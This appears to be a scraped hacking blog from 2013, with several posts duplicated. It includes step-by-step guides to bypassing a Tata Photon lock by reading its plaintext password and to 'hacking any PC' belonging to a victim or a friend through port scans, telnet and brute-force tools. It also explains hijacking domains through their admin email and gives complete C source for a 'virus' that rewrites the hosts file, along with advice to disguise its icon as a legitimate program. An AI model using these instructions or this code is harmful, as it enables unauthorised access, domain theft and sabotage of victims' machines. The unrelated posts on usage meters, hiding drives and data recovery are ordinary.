Are you a user of tata photon, someone locked it and you want to use
internet but do not know the password, no such a big matter, its simple
as drinking water!
Break the password in these simple steps:-
1. Goto C:\Program Files\Tata Photon+\Huawei\userdata [Installation folder]
2. Then open UserSetting.xml
3. It will look like this:
<?xml version="1.0" encoding="UTF-8"?>
<utpsdoc>
<system>
<devicename>EC1261</devicename>
</system>
<security>
<GeneralLock>1</GeneralLock>
<InternetLock>1</InternetLock>
<LockPassword>1234</LockPassword>
</security>
<CBSSettingPlugin>
<AutoCleanup>0</AutoCleanup>
</CBSSettingPlugin>
<xframemodule>
<undialupromaining>0</undialupromaining>
<nosplashscreen>0</nosplashscreen>
</xframemodule>
</utpsdoc>
4.Now, see these lines:-
<GeneralLock>1</GeneralLock>
<InternetLock>1</InternetLock>
<LockPassword>1234</LockPassword>
Here is your current password, see your password in this field <LockPassword>1234</LockPassword>
Very poor and hackable programming!
Wednesday, 27 March 2013
How to monitor your internet usage:
A lot of internet users want to monitor his/her internet usage. I think
you too. But, many of them dont know how to do it. So, we have written
this tutorial for you all.
By reading this tutorial, you will be able to monitor your internet usage, i.e. your download usage, upload usage, etc.
Steps:-
Another good program like "Broadband Usage Meter" is:
NetWorx, its also good. Just install it and start using it.
There are a few more good programs for this, you may also like this: http://www.shaplus.com/bandwidth-meter/ [Freeware]
http://addgadget.com/network_meter/ [Shareware]
http://www.bwmonitor.com/freedown.htm [Freeware]
http://www.rokario.com/products/bandmon/2-0/ [Freeware]
http://www.hageltech.com/dumeter/about [Shareware]
Enjoy
By reading this tutorial, you will be able to monitor your internet usage, i.e. your download usage, upload usage, etc.
Steps:-
- First of all, you need a software named "Broadband Usage Meter", you may download it from here: http://www.rackeys.com/Downloads/Softwares.html , its a small software but powerful.
- After download, double click on it to run the setup wizard, then install. It may ask you to select your network, then select it. For example, if you are using photon +, then installer will show you tata photon + in the list, select it and continue. Dont forget to check any option of auto start on windows startup.
- It will run automatically on windows startup.
- Now, its monitoring your internet usage. A meter will come at the top of your screen in green color. This will show your all statics.
Another good program like "Broadband Usage Meter" is:
NetWorx, its also good. Just install it and start using it.
There are a few more good programs for this, you may also like this: http://www.shaplus.com/bandwidth-meter/ [Freeware]
http://addgadget.com/network_meter/ [Shareware]
http://www.bwmonitor.com/freedown.htm [Freeware]
http://www.rokario.com/products/bandmon/2-0/ [Freeware]
http://www.hageltech.com/dumeter/about [Shareware]
Enjoy
Tuesday, 19 March 2013
Hacking Any PC Using IP Address
Literally, hacking is to get something or someone on the internet without
their consent or interest. While speaking of a short, hacking is a very easy
job, it is as if instead of the using front door, finding a hidden door of a
house and the seizure of valuables(hijacking the precious things). Among
the main hacking, hacking through the IP address is one of the most
common yet with a powerful beggining.
You may want to hack the website and put your advertisement there or grab
some database information.
In this type of hacking, you are playing with the web server’s computer
instead of the administrator’s computer.
Because for eg. www.website.com is in a separate Web server instead of
the personal computer.
Another might be to access the computer of your friend from your home.
Again, based on IP, and it is only possible when your friend’s computer is
online. If it is off or not connected to the Internet, allowing external IP
hacking(remote IP Hacking) is quite impossible.
Well, both have the same process. So Let's summarize what we should do.
First Of All Confirm the site or the computer you wanna hack.
1. Discover or trace their IP addresses.
2. Verify that the IP address is online
3. Scan open ports
4. Check the doors Venerability(for venerable ports)
5. Access through the door(probably the port).
6. Brute force username and password
Now let me just briefly describe the basic steps that a child can also
understand if you didnt get.
First, get the IP address of the victim.
To get the IP address of the victim's website, ping for it in command
prompt.
For example,
ping www.google.com
=>
To retrieve the IP address of google.com
That's how we can get the IP address of the victim's website.
What about your friend's PC? You can't do www.yourfriendname.com, huh?
Finding the IP address of your friend's PC is a bit complicated and most
difficult, if it has a dynamic IP address, which changes constantly.
A common method to detect the IP address of your friend is talking to him.
Go Here From your Friend's Computer:
http://www.tracemyip.org/
From Here You Can Check Out His IP-Address & Note It Down somewhere.
Now, did you have the IP address?
If yes then do check it out if he/she's online? ITo know the online status just
ping the IP address, if it is online it will reply.
If the IP address is online, scan for the open ports. Open ports are like
closed doors, without locks, you can get in and out easily.
Use the Advanced Port Scanner to scan all open and venerable ports/doors.
Now that you have the IP address and open port of the victim, now you can
use telnet to try to access it.
Make sure you have telnet enabled on your computer or install it from:
Control Panel > Add or Remove Programs > Add Windows Components
Then open command prompt and use the telnet command to access the IP
address.
Use the following syntax for the connection.
You will be prompted for login information.
If you can easily guess the information then it's okay. Or you can use some
brute force tools below.
1. Brutus
Brutus is one of the fastest, most flexible remote password crackers you can
get your hands on - is also free. It 'available for Windows 9x, NT and 2000,
there is no UN * X version available although it is possible at some point in
the future. This Windows-only cracker bangs against network services of
remote systems trying to guess passwords using a dictionary and its
permutations. It supports HTTP, POP3, FTP, SMB, Telnet, IMAP, NTP, and
more.
Platform: Windows
2. THC-HYDRA
This tool enables the rapid dictionary attacks against systems connecting to
the network, including FTP, POP3, IMAP, Net-bios, Telnet, HTTP
authentication, LDAP NNTP, VNC, ICQ, SOCKS5, PCNFS, and more. Includes
SSL support and is apparently now part of Nessus.
Platform: UNIX , Windows
3. TSGrinder
TSGrinder terminal server is the first gross instrument of force. The main
idea is that the administrator account, since it cannot be locked out for local
logons, can be brute forced. And having an encrypted channel for the
process of TS Logon that helps to keep IDS from catching the attempts.
This is a "dictionary" based attack tool, but has some interesting features
like "1337" conversion and supports multiple attack windows from a single
dictionary file. It supports multiple password attempts in the same way, and
lets you specify how often you try a combination of username / password
on a particular connection.
Platform: Windows
In this way, you will be able to hack remote computer using just the IP
address . !!
their consent or interest. While speaking of a short, hacking is a very easy
job, it is as if instead of the using front door, finding a hidden door of a
house and the seizure of valuables(hijacking the precious things). Among
the main hacking, hacking through the IP address is one of the most
common yet with a powerful beggining.
You may want to hack the website and put your advertisement there or grab
some database information.
In this type of hacking, you are playing with the web server’s computer
instead of the administrator’s computer.
Because for eg. www.website.com is in a separate Web server instead of
the personal computer.
Another might be to access the computer of your friend from your home.
Again, based on IP, and it is only possible when your friend’s computer is
online. If it is off or not connected to the Internet, allowing external IP
hacking(remote IP Hacking) is quite impossible.
Well, both have the same process. So Let's summarize what we should do.
First Of All Confirm the site or the computer you wanna hack.
1. Discover or trace their IP addresses.
2. Verify that the IP address is online
3. Scan open ports
4. Check the doors Venerability(for venerable ports)
5. Access through the door(probably the port).
6. Brute force username and password
Now let me just briefly describe the basic steps that a child can also
understand if you didnt get.
First, get the IP address of the victim.
To get the IP address of the victim's website, ping for it in command
prompt.
For example,
ping www.google.com
=>
To retrieve the IP address of google.com
That's how we can get the IP address of the victim's website.
What about your friend's PC? You can't do www.yourfriendname.com, huh?
Finding the IP address of your friend's PC is a bit complicated and most
difficult, if it has a dynamic IP address, which changes constantly.
A common method to detect the IP address of your friend is talking to him.
Go Here From your Friend's Computer:
http://www.tracemyip.org/
From Here You Can Check Out His IP-Address & Note It Down somewhere.
Now, did you have the IP address?
If yes then do check it out if he/she's online? ITo know the online status just
ping the IP address, if it is online it will reply.
If the IP address is online, scan for the open ports. Open ports are like
closed doors, without locks, you can get in and out easily.
Use the Advanced Port Scanner to scan all open and venerable ports/doors.
Now that you have the IP address and open port of the victim, now you can
use telnet to try to access it.
Make sure you have telnet enabled on your computer or install it from:
Control Panel > Add or Remove Programs > Add Windows Components
Then open command prompt and use the telnet command to access the IP
address.
Use the following syntax for the connection.
You will be prompted for login information.
If you can easily guess the information then it's okay. Or you can use some
brute force tools below.
1. Brutus
Brutus is one of the fastest, most flexible remote password crackers you can
get your hands on - is also free. It 'available for Windows 9x, NT and 2000,
there is no UN * X version available although it is possible at some point in
the future. This Windows-only cracker bangs against network services of
remote systems trying to guess passwords using a dictionary and its
permutations. It supports HTTP, POP3, FTP, SMB, Telnet, IMAP, NTP, and
more.
Platform: Windows
2. THC-HYDRA
This tool enables the rapid dictionary attacks against systems connecting to
the network, including FTP, POP3, IMAP, Net-bios, Telnet, HTTP
authentication, LDAP NNTP, VNC, ICQ, SOCKS5, PCNFS, and more. Includes
SSL support and is apparently now part of Nessus.
Platform: UNIX , Windows
3. TSGrinder
TSGrinder terminal server is the first gross instrument of force. The main
idea is that the administrator account, since it cannot be locked out for local
logons, can be brute forced. And having an encrypted channel for the
process of TS Logon that helps to keep IDS from catching the attempts.
This is a "dictionary" based attack tool, but has some interesting features
like "1337" conversion and supports multiple attack windows from a single
dictionary file. It supports multiple password attempts in the same way, and
lets you specify how often you try a combination of username / password
on a particular connection.
Platform: Windows
In this way, you will be able to hack remote computer using just the IP
address . !!
How to Hide Entire Drives Partition Without Registry
This is the best security tip to be employ against unauthorised users.
Steps:
- Go to Start > Run > type “diskpart“.
- Then type “list volume“
- Suppose you want to hide drive E then type “select volume 3″
- Now type “remove letter E“
- Sometime it requires to reboot the computer.
- Diskpart will remove the letter.
Note: Windows XP is not having capabilty to identify the unknown volume.
Your Data is now safe from unauthorised users.
Your Data is now safe from unauthorised users.
To access the content of hidden Drive repeat the process mentioned above. But in 4th step replace ” remove” by “assign”.
It means type “assign letter E”.
It means type “assign letter E”.
How data recovery programs works
Have you ever wonder, how data recovery software works ? I mean,
everybody knows, when you delete files them are going to a special
folder Recycle Bin, but what is happening when you
empty Recycle Bin ? To understand this we must first understand how data
are stored on storage devices e.g. hard drives. I don’t want to write a
very “technical” article, instead I will try to keep it as simple as I
can.
The most commonly file system formats used in modern Microsoft Windows based systems are FAT (File Allocation Table) and NTFS (New Technology File System). The FAT and FAT32 is used predominantely by systems running earlier Windows versions than Microsoft Windows XP for USB flash drives or memory cards, while NTFS is preffered for newer versions of Windows : XP, Vista, 7 or Windows Server 2008.
The smallest data unit is called a sector and has on
Windows based systems hard disks a default size of 512 bytes but it’s
not used for direct space allocation as it is, instead the filesystem
use multiple sectors to hold a data file. Them are called clusters and are composed from 1 sector (512 B) to 128 sectors (64 KiB).
A) — a concentric magnetic field is called a track;
B) — a geometrical sector;
C) — tracks are divided in sectors the smallest unit for holding data. Usually it can hold 512 bytes of data. However, for storing a file, the smallest unit used is a cluster. Sectors identification data as starting adress are written at the beginning of the sector by the factory track-positioning data;
D) — multiple sectors , from 1 up to 128, forms a cluster. In the image above the cluster are composed by 4 sectors. If a sector is 512 bytes in size, then the cluster can hold 2048 bytes. For a file with a size in 0-2000 bytes range, a cluster will be allocated. Always the sectors numbers composing a cluster is an exponent of 2 : 1 sector, 2 ,4 , 8 and so on;
When a user format a hard drive under Windows, he must choice an Allocation unit size in this range: 512B–64KB. If we have a lot of small files in the computer and we are using big allocation unit size, this result in a lot of wasted hard disk space. For example if we have a lot of around 20-30KB size files and we allocate for them 64KB space storage, the rest of unused space is wasted, however taking in calculation actual hard disk sizes this is not something to concern us too much like in the past when hard disk space was limited and expensive.
In FAT architecture, the files and directories are stored in Data Region. There is also Directory Table where are stored informations about files and folders, names, extensions, attributes of the files, creation time, the adress of the first cluster of the file thus pinpointing which clusters are used to store a certain file or directory, and finally the size of the file or directory. Each entry associated with a file has 32 bytes in size.
In NTFS architecture the Directory Table is replaced by the Master File Table(MFT) containing informations about the files as : length of a file, location of the file, permissions (not available for FAT). These informations are known as file attributes and are stored in so called metadata files.
The FAT Region is kind of table of content containing informations about all clusters in a partition. It includes multiple records about clusters e.g. : if it’s a free cluster, if it’s a bad one, if it’s used and what is the next cluster in the chain or if it’s the last cluster in the chain(or EOC-End Of Chain) allocated to store a file.
The Boot Sector containing the system boot loader code is located in Reserved Sectors. Another subsections as File System Information Sector or Backup Boot Sector are also placed there.
The first sector on a hard disk is the Master Boot Record or MBR created concomitant with the creation of the first partition on hard disk. For other un-partitioned storage devices the first sector is called Volume Boot Record, VBR shortly. This is the case also for a hard disk with several partitions, the first sector in a partition is VBR while the first sector of the whole hard disk is MBR.
The MBR contains a partition table with entries for each partition, when a Windows system is booting, the MBR code loaded by the bootstrapping firmware contained within the ROM BIOS, search for a partition marked as active and when it is found, it reads the VBR code from that partition passing the control to the Windows loader(NTLDR for all versions of Windows up to Windows Server 2003). On the later Microsoft Windows versions as Vista or Windows 7, NTLDR is replaced by the Windows Boot Manager(BOOTMGR) which contain the boot loader code–the bootstrap and the functionality is the same as the NTLDR.
Now on the subject, what is happening when a file is deleted from Recycle Bin and when a NTFS hard disk is formatted ? When you empty the Recycle Bin, all the files from there are marked as deleted and unusable by the operating system and their allocated space may be available to be overwritten by another file. This is why you have a great chance to recover a file if the recovery actions are taken immediately after deletion. Older deleted files has more chances to be overwritten by the new files we save on the hard disk and thus fewer chances to be fully recovered.
In the case of hard disk formatting, the Master Boot Record and the Master File Table are erased but the real data of the files are still there on the hard disk being possible to recover them. The format system offer two options, quick and full format with only difference that the full formatting of a hard disk will check for “bad sectors”, will flag it as unusable by the operating system and will try to reallocate it with a sector that is keept as a “back-up” sector on the hard disk. On every hard disk there is a bunch of sectors specially reserved for replacing the eventually bad sectors.
However this is the theory, because when a formatting of a hard disk or a storage device is done, only MFT and MBR(VBR) for NTFS or the Directory Table for FAT structure is erased but the files still exists, a software can instruct the driver for a low level “bit-by-bit or better said sector-by-sector” reading of the device looking for data files.
Consequently if you want to truly delete your data,a special software must be used the so called “disk scrubbers, shredders or disk wipers”, able to overwrite all the sectors on hard disk with 0 character or special bit patterns. Often such software has an option for repetition of deletion for the most “paranoids” of users. Though I never tested them, there is software that claims it can recover overwritten data by instructing the hard disk driver to read low level remanent magnetic fields on a hard disk, that’s why some of the users preffer to wipe the hard disk several times. However, in forensic laboratories this is theoretically possible. If you sell or donate your old computer, old laptop or you are keeping sensitive data on the computer and you are afraid for it to be stolen, a disk wiper may interest you.
Let’s mention some good data recovery software :
iCare Data Recovery Software
It can run from an USB device, no need to install it in the computer and does a pretty good job recovering in seconds lost data from hard disks, memory cards, smart media, ipod and almost any storage device. The recovered files for example photos can be previewed while the searching for files continue. The program can helps if :
As a bonus for reading this article, you can have iCare Data Recovery Software for free and this is why :
Was a Free license giveaway that must end in 25 May 2010, but when I’ve tested the download link from the official site and the giveaway license I’ve found on the Internet, I have had the pleasant surprise to discover the free license still works.
The free license code is :
Grab it quickly while you can still have a 69,95$ worth software for free.
EASEUS Data Recovery Wizard
Offer a free edition of the software. It has an intuitive interface, being very simple to use, recover from formatted disks, memory cards, flash USB drives.
Recuva
From the creators of well known CCleaner, it’s a free product with a portable version provided aswell. Restore deleted emails, Word documents, iPod music, photos from a deleted or formatted partition from your PC or from a memory card. A preview of any recovered image is possible in the program window.
For disk wipe utilities can be mentioned :
Disk Wipe
Free software doing very well its job. It uses several shredding algorithms and can definitively erase hard disks, USB thumbs or memory cards.
Eraser
It can erase your hard disk according to the US Department of Defense (DOD) standard to repete the data overwritten process with random bytes, 3 or 7 times or the Gutmann recommendation of 35 times. It works under all versions of Windows including Vista and Windows 7.
Freeraser
The same as previous, it eliminates all the possibilities to recover data from a processed storage device.
Disk Scrubber by MariusSoft
It has an affordable price, it’s a relatively new software. It can wipe the NTFS partitions of your hard disk.
The most commonly file system formats used in modern Microsoft Windows based systems are FAT (File Allocation Table) and NTFS (New Technology File System). The FAT and FAT32 is used predominantely by systems running earlier Windows versions than Microsoft Windows XP for USB flash drives or memory cards, while NTFS is preffered for newer versions of Windows : XP, Vista, 7 or Windows Server 2008.
A) — a concentric magnetic field is called a track;
B) — a geometrical sector;
C) — tracks are divided in sectors the smallest unit for holding data. Usually it can hold 512 bytes of data. However, for storing a file, the smallest unit used is a cluster. Sectors identification data as starting adress are written at the beginning of the sector by the factory track-positioning data;
D) — multiple sectors , from 1 up to 128, forms a cluster. In the image above the cluster are composed by 4 sectors. If a sector is 512 bytes in size, then the cluster can hold 2048 bytes. For a file with a size in 0-2000 bytes range, a cluster will be allocated. Always the sectors numbers composing a cluster is an exponent of 2 : 1 sector, 2 ,4 , 8 and so on;
When a user format a hard drive under Windows, he must choice an Allocation unit size in this range: 512B–64KB. If we have a lot of small files in the computer and we are using big allocation unit size, this result in a lot of wasted hard disk space. For example if we have a lot of around 20-30KB size files and we allocate for them 64KB space storage, the rest of unused space is wasted, however taking in calculation actual hard disk sizes this is not something to concern us too much like in the past when hard disk space was limited and expensive.
In FAT architecture, the files and directories are stored in Data Region. There is also Directory Table where are stored informations about files and folders, names, extensions, attributes of the files, creation time, the adress of the first cluster of the file thus pinpointing which clusters are used to store a certain file or directory, and finally the size of the file or directory. Each entry associated with a file has 32 bytes in size.
In NTFS architecture the Directory Table is replaced by the Master File Table(MFT) containing informations about the files as : length of a file, location of the file, permissions (not available for FAT). These informations are known as file attributes and are stored in so called metadata files.
The FAT Region is kind of table of content containing informations about all clusters in a partition. It includes multiple records about clusters e.g. : if it’s a free cluster, if it’s a bad one, if it’s used and what is the next cluster in the chain or if it’s the last cluster in the chain(or EOC-End Of Chain) allocated to store a file.
The Boot Sector containing the system boot loader code is located in Reserved Sectors. Another subsections as File System Information Sector or Backup Boot Sector are also placed there.
The first sector on a hard disk is the Master Boot Record or MBR created concomitant with the creation of the first partition on hard disk. For other un-partitioned storage devices the first sector is called Volume Boot Record, VBR shortly. This is the case also for a hard disk with several partitions, the first sector in a partition is VBR while the first sector of the whole hard disk is MBR.
The MBR contains a partition table with entries for each partition, when a Windows system is booting, the MBR code loaded by the bootstrapping firmware contained within the ROM BIOS, search for a partition marked as active and when it is found, it reads the VBR code from that partition passing the control to the Windows loader(NTLDR for all versions of Windows up to Windows Server 2003). On the later Microsoft Windows versions as Vista or Windows 7, NTLDR is replaced by the Windows Boot Manager(BOOTMGR) which contain the boot loader code–the bootstrap and the functionality is the same as the NTLDR.
Now on the subject, what is happening when a file is deleted from Recycle Bin and when a NTFS hard disk is formatted ? When you empty the Recycle Bin, all the files from there are marked as deleted and unusable by the operating system and their allocated space may be available to be overwritten by another file. This is why you have a great chance to recover a file if the recovery actions are taken immediately after deletion. Older deleted files has more chances to be overwritten by the new files we save on the hard disk and thus fewer chances to be fully recovered.
In the case of hard disk formatting, the Master Boot Record and the Master File Table are erased but the real data of the files are still there on the hard disk being possible to recover them. The format system offer two options, quick and full format with only difference that the full formatting of a hard disk will check for “bad sectors”, will flag it as unusable by the operating system and will try to reallocate it with a sector that is keept as a “back-up” sector on the hard disk. On every hard disk there is a bunch of sectors specially reserved for replacing the eventually bad sectors.
However this is the theory, because when a formatting of a hard disk or a storage device is done, only MFT and MBR(VBR) for NTFS or the Directory Table for FAT structure is erased but the files still exists, a software can instruct the driver for a low level “bit-by-bit or better said sector-by-sector” reading of the device looking for data files.
Consequently if you want to truly delete your data,a special software must be used the so called “disk scrubbers, shredders or disk wipers”, able to overwrite all the sectors on hard disk with 0 character or special bit patterns. Often such software has an option for repetition of deletion for the most “paranoids” of users. Though I never tested them, there is software that claims it can recover overwritten data by instructing the hard disk driver to read low level remanent magnetic fields on a hard disk, that’s why some of the users preffer to wipe the hard disk several times. However, in forensic laboratories this is theoretically possible. If you sell or donate your old computer, old laptop or you are keeping sensitive data on the computer and you are afraid for it to be stolen, a disk wiper may interest you.
Let’s mention some good data recovery software :
iCare Data Recovery Software
It can run from an USB device, no need to install it in the computer and does a pretty good job recovering in seconds lost data from hard disks, memory cards, smart media, ipod and almost any storage device. The recovered files for example photos can be previewed while the searching for files continue. The program can helps if :
- Drive become raw;
- Corrupted MBR;
- Lost partitions or USB device not detected error;
- Drive not formatted error;
- Recover files from dynamic disk, RAID ;
- Bad MFT, bad MBR, bad partition table;
- Deleted files by viruses;
- Accidentally deleted or formatted hard disk or any other media storage;
- Lost Partition Recovery;
- Advanced Files Recovery;
- Deep Scan Recover, itb uses a special algorithm;
- Format recovery;
As a bonus for reading this article, you can have iCare Data Recovery Software for free and this is why :
Was a Free license giveaway that must end in 25 May 2010, but when I’ve tested the download link from the official site and the giveaway license I’ve found on the Internet, I have had the pleasant surprise to discover the free license still works.
The free license code is :
2K1XB2X964MPHOCJ8M1R6IJF0OVHFOFHand the official download link is here.
Grab it quickly while you can still have a 69,95$ worth software for free.
EASEUS Data Recovery Wizard
Offer a free edition of the software. It has an intuitive interface, being very simple to use, recover from formatted disks, memory cards, flash USB drives.
Recuva
From the creators of well known CCleaner, it’s a free product with a portable version provided aswell. Restore deleted emails, Word documents, iPod music, photos from a deleted or formatted partition from your PC or from a memory card. A preview of any recovered image is possible in the program window.
For disk wipe utilities can be mentioned :
Disk Wipe
Free software doing very well its job. It uses several shredding algorithms and can definitively erase hard disks, USB thumbs or memory cards.
Eraser
It can erase your hard disk according to the US Department of Defense (DOD) standard to repete the data overwritten process with random bytes, 3 or 7 times or the Gutmann recommendation of 35 times. It works under all versions of Windows including Vista and Windows 7.
Freeraser
The same as previous, it eliminates all the possibilities to recover data from a processed storage device.
Disk Scrubber by MariusSoft
It has an affordable price, it’s a relatively new software. It can wipe the NTFS partitions of your hard disk.
Tuesday, 12 March 2013
Domain Hijacking – How to Hijack a Domain
In this post I will tell you about how the domain names are hacked and
how they can be protected. The act of hacking domain names is commonly
known as Domain Hijacking. For most of you, the term
“domain hijacking” may seem to be like an alien. So let me first tell
you what domain hijacking is all about.
Domain hijacking is a process by which Internet Domain Names
are stolen from it’s legitimate owners. Domain hijacking is also known
as domain theft. Before we can proceed to know how to hijack domain
names, it is necessary to understand how the domain names operate and
how they get associated with a particular web server (website).
The operation of domain name is as follows
Any website say for example gohacking.com consists of two parts. The domain name (gohacking.com) and the web hosting server
where the files of the website are actually hosted. In reality, the
domain name and the web hosting server (web server) are two different
parts and hence they must be integrated before a website can operate
successfully. The integration of domain name with the web hosting server
is done as follows.
1. After registering a new domain name, we get a control panel where in we can have a full control of the domain.
2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.
For a clear understanding let me take up a small example.
John registers a new domain “abc.com” from an X domain registration company. He also purchases a hosting plan from Y
hosting company. He uploads all of his files (.html, .php, javascripts
etc.) to his web server (at Y). From the domain control panel (of
X) he configures his domain name “abc.com” to point to his web server
(of Y). Now whenever an Internet user types “abc.com”, the domain name
“abc.com” is resolved to the target web server and the web page is
displayed. This is how a website actually works.
What happens when a domain is hijacked
Now
let’s see what happens when a domain name is hijacked. To hijack a
domain name you just need to get access to the domain control panel and
point the domain name to some other web server other than the original
one. So to hijack a domain you need not gain access to the target web
server.
For example, a hacker gets
access to the domain control panel of “abc.com”. From here the hacker
re-configures the domain name to point it to some other web server (Z).
Now whenever an Internet user tries to access “abc.com” he is taken to
the hacker’s website (Z) and not to John’s original site (Y).
In this case the John’s domain name (abc.com) is said to be hijacked.
How the domain names are hijacked
To
hijack a domain name, it’s necessary to gain access to the domain
control panel of the target domain. For this you need the following
ingredients
1. The domain registrar name for the target domain.
2. The administrative email address associated with the target domain.
These information can be obtained by accessing the WHOIS data of the target domain. To get access the WHOIS data, goto whois.domaintools.com, enter the target domain name and click on Lookup. Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.
To get the domain registrar name, look for something like this under the Whois Record.
“Registration Service Provided By: XYZ Company”. Here XYZ Company is
the domain registrar. In case if you don’t find this, then scroll up and
you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.
The administrative email address
associated with the domain is the backdoor to hijack the domain name.
It is the key to unlock the domain control panel. So to take full
control of the domain, the hacker will hack the administrative email
associated with it.
Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address
to initiate the password reset process. Once this is done all the
details to reset the password will be sent to the administrative email
address. Since the hacker has the access to this email account he can
easily reset the password of domain control panel. After resetting the
password, he logs into the control panel with the new password and from
there he can hijack the domain within minutes.
How to protect the domain name from being hijacked
The
best way to protect the domain name is to protect the administrative
email account associated with the domain. If you loose this email
account, you loose your domain. Another best way to protect your domain is to go for private domain registration.
When you register a domain name using the private registration option,
all your personal details such as your name, address, phone and
administrative email address are hidden from the public. So when a
hacker performs a WHOIS lookup for you domain name, he will not be able
to find your name, phone and administrative email address. So the
private registration provides an extra security and protects your
privacy. Private domain registration costs a bit extra amount but is
really worth for it’s advantages. Every domain registrar provides an
option to go for private registration, so when you purchase a new domain
make sure that you select the private registration option.
A Virus Program to Block Websites
Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.
This virus has been exclusively created in ‘C’.
So, anyone with a basic knowledge of C will be able to understand the
working of the virus. This virus need’s to be clicked only once by the
victim. Once it is clicked, it’ll block a list of websites that has
been specified in the source code. The victim will never be able to
surf those websites unless he re-install’s the operating system. This
blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.
NOTE:
You can also block a website manually. But, here I have created a
virus that automates all the steps involved in blocking.Here is the sourcecode of the virus.
#include<stdio.h>
#include<dos.h>
#include<dir.h> char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;
int find_root(void);
void block_site(void);
int find_root()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
else return 0;
}
void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}
void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}
#include<dos.h>
#include<dir.h> char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;
int find_root(void);
void block_site(void);
int find_root()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
else return 0;
}
void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}
void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}
How to Compile ?
For step-by-step compilation guide, refer my post How to compile C Programs.
Testing
1. To test, run the compiled module. It will block the sites that is listed in the source code.
2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.
3. To remove the virus type the following the Run.
%windir%\system32\drivers\etc
4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this
127.0.0.1 google.com
5. Delete all such entries which contain the names of blocked sites.
NOTE: You can also change the ICON of the virus to make it look like a legitimate program.
Subscribe to:
Posts (Atom)